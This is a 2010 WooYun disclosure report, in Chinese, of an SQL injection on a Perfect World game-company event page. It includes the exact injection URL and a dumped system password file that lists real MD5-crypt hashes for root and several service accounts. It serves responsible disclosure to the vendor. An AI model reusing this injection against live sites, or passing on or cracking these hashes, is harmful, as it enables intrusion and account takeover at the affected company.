漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2010-0700
漏洞标题:完美时空可以注入MYsql ROOT权限
相关厂商:完美时空
漏洞作者: 路人甲
提交时间:2010-10-15 23:12
修复时间:2010-11-15 00:00
公开时间:2010-11-15 00:00
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2010-10-15: 细节已通知厂商并且等待厂商处理中
2010-10-18: 厂商已经确认,细节仅向厂商公开
2010-10-28: 细节向核心白帽子及相关领域专家公开
2010-11-07: 细节向普通白帽子公开
2010-11-17: 细节向实习白帽子公开
2010-11-15: 细节向公众公开
简要描述:
完美时空SQL injection漏洞
详细说明:
通过些漏洞,可以注入获取数据库相关敏感信息。
漏洞证明:
利用方式:http://event3.wanmei.com/jsp/wlspanserverpk/winguess.jsp?server=632&winteam=Destroy%d8%bc'
获取系统相关信息:
root:$1$JsIu2E3a$yCLHEGlChJqifF1Ec9PzT0:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:/sbin login
daemon:*:2:2:daemon:/sbin:/sbin login
adm:*:3:4:adm: ar/adm:/sbin login
lp:*:4:7:lp: ar/spool/lpd:/sbin login
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail: ar/spool/mail:/sbin login
news:*:9:13:news:/etc/news:
uucp:*:10:14:uucp: ar/spool/uucp:/sbin login
operator:*:11:0:operator:/root:/sbin login
games:*:12:100:games:/usr/games:/sbin login
gopher:*:13:30:gopher: ar/gopher:/sbin login
ftp:*:14:50:FTP User: ar/ftp:/sbin/nologin
nobody:*:99:99:Nobody:/:/sbin login
vcsa:!!:69:69:virtual console memory owner:/dev:/sbin login
ntp:!!:38:38::/etc/ntp:/sbin login
rpc:!!:32:32:Portmapper RPC user:/:/sbin login
sshd:!!:74:74:Privilege-separated SSH: ar/empty/sshd:/sbin login
mysql:!!:500:500:MySQL server:/web/mysql:/bin/bash
web:$1$5zPWixq4$w/bW86UYHeWQAz3GUSQy2/:501:501::/web/JSPWeb:/sbin login
rsyncweb:$1$TU5dKsuC$zxS2v1spWzeGU19emoBoE.:502:502::/web/rsyncweb:/bin/bash
huodong:$1$o5hq2INm$h7NqTssNaTGnah4uhUjd8.:503:99::/web/www:/usr/local/ssh/bin/ssh-dummy-shell
#rsyncUPload:$1$F/JLHKcj$mM75KHgWw/77.CDcw5w.n.:504:504::/web/www/:/bin/bash
修复方案:
过滤
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:5
确认时间:2010-10-18 10:37
厂商回复:
谢谢提交漏洞,我们马上修补
最新状态:
暂无